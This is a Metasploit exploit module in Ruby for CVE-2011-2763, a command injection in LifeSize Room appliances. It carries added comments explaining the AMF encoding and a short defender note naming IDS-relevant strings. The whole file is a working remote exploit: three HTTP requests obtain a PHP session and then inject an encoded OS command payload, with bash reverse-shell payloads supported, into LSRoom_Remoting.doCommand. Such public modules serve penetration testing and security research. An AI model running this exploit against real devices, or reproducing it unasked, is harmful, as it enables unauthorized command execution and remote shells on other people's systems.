GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/lifesize_room.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Command injection against LifeSize Room through its AMF gateway
  # (CVE-2011-2763, see 'References' below). The exchange in #exploit is three
  # HTTP requests: obtain a PHP session cookie from /interface/interface.php,
  # exercise it against /gateway.php, then post the AMF message that carries the
  # encoded payload to LSRoom_Remoting.doCommand.
  #
  # Defender note: the requests that matter are POSTs to /gateway.php with
  # Content-Type application/x-amf, and the final one names
  # LSRoom_Remoting.doCommand in its body; those are the observable strings a
  # proxy or IDS rule would key on. The affected versions named in
  # 'Description' (3.5.3 and 4.7.18) are the only remediation boundary this
  # module states.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers the module's metadata with the framework; info is merged through
  # update_info and handed to the superclass unchanged.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'LifeSize Room Command Injection',
      'Description' => %q{
        This module exploits a vulnerable resource in LifeSize
        Room versions 3.5.3 and 4.7.18 to inject OS commands. LifeSize
        Room is an appliance and thus the environment is limited
        resulting in a small set of payload options.
      },
      'Author' =>
        [
          # SecureState R&D Team - Special Thanks To Chris Murrey
          'Spencer McIntyre',
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2011-2763' ],
          [ 'OSVDB', '75212' ],
        ],
      'Privileged' => false,
      'Payload' =>
        {
          'DisableNops' => true,
          # #exploit writes the payload length with pack('n'), i.e. an unsigned
          # 16-bit big-endian field, which is where the 65535 ceiling comes from.
          'Space' => 65535, # limited by the two byte size in the AMF encoding
          # Only command payloads are compatible; the Description attributes the
          # narrow choice to the appliance's limited environment.
          'Compat' =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic bash-tcp',
            }
        },
      'Platform' => [ 'unix' ],
      'Arch' => ARCH_CMD,
      'Targets' => [ [ 'Automatic', { } ] ],
      'DisclosureDate' => '2011-07-13',
      'DefaultTarget' => 0,
      'Notes' =>
        {
          'Stability' => [ CRASH_SAFE, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
        },
    ))
  end

  # Runs the three-request exchange described on the class. The result of the
  # final request is assigned to res and then dropped when the method returns,
  # so success is judged by the framework from the payload's callback rather
  # than from the HTTP response. Aborts through fail_with when no session
  # cookie comes back or the validation request gets no response at all.
  def exploit
    print_status("Requesting PHP Session...")
    # The second argument (10) is the per-request timeout handed to
    # send_request_cgi; the same value is used for all three requests.
    # 'encode' => false disables the client's request encoding — presumably so
    # the raw AMF bodies below go out untouched; confirm against HttpClient.
    res = send_request_cgi({
      'encode' => false,
      'uri' => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
      'method' => 'GET',
    }, 10)

    # Only "no response" and "no cookies at all" are treated as failure here.
    if res.nil? || res.get_cookies.empty?
      fail_with(Failure::NotFound, 'Could not obtain a Session ID')
    end

    # Pulls the PHPSESSID value out of the raw cookie string. The guard above
    # does not check that a PHPSESSID cookie is present: if other cookies came
    # back but that one did not, split('PHPSESSID=')[1] is nil and the second
    # split raises NoMethodError instead of going through fail_with.
    # Note that << appends to the 'PHPSESSID=' literal in place; this file has
    # no frozen_string_literal magic comment, which is the only reason that works.
    sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0]

    # Shared by both POSTs: the session cookie and the AMF content type.
    headers = {
      'Cookie' => sessionid,
      'Content-Type' => 'application/x-amf',
    }

    print_status("Validating PHP Session...")

    # AMF message carrying two method calls. Each method name is preceded by a
    # two-byte big-endian length: \x00\x1b (27) for the 27-character
    # "LSRoom_Remoting.amfphpLogin" and \x00\x17 (23) for the 23-character
    # "LSRoom_Remoting.getHost". Beyond exercising the session, what the
    # gateway does with these two calls is not visible from this file.
    data = "\x00\x00\x00\x00\x00\x02\x00\x1b"
    data << "LSRoom_Remoting.amfphpLogin"
    data << "\x00\x02/1\x00\x00\x00"
    data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
    data << "LSRoom_Remoting.getHost"
    data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"

    res = send_request_cgi({
      'encode' => false,
      'uri' => '/gateway.php',
      'data' => data,
      'method' => 'POST',
      'headers' => headers,
    }, 10)

    # Only the presence of a response is checked; its status code and body are
    # not inspected, so a rejected session would still fall through to the
    # final request. fail_with raises, so the return beneath it is unreachable.
    if not res
      fail_with(Failure::NotFound, 'Could not validate the Session ID')
      return
    end

    print_status("Sending Malicious POST Request...")

    # This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
    # \x00\x19 (25) prefixes the 25-character method name. The payload itself is
    # written as an AMF string: a two-byte big-endian length from pack('n')
    # followed by the bytes of payload.encoded, then the 13-character
    # "upgradeStatus" string with its own \x00\x0d (13) length prefix.
    amf_data = "\x00\x00\x00\x00\x00\x01\x00\x19"
    amf_data << "LSRoom_Remoting.doCommand"
    amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
    amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
    amf_data << "\x02\x00\x0dupgradeStatus"

    # The session id is sent twice here: in the query string (appended to the
    # '/gateway.php?' literal in place) and again via the Cookie header. The
    # response is assigned to res and never read.
    res = send_request_cgi({
      'encode' => false,
      'uri' => '/gateway.php?' << sessionid,
      'data' => amf_data,
      'method' => 'POST',
      'headers' => headers
    }, 10)
  end
end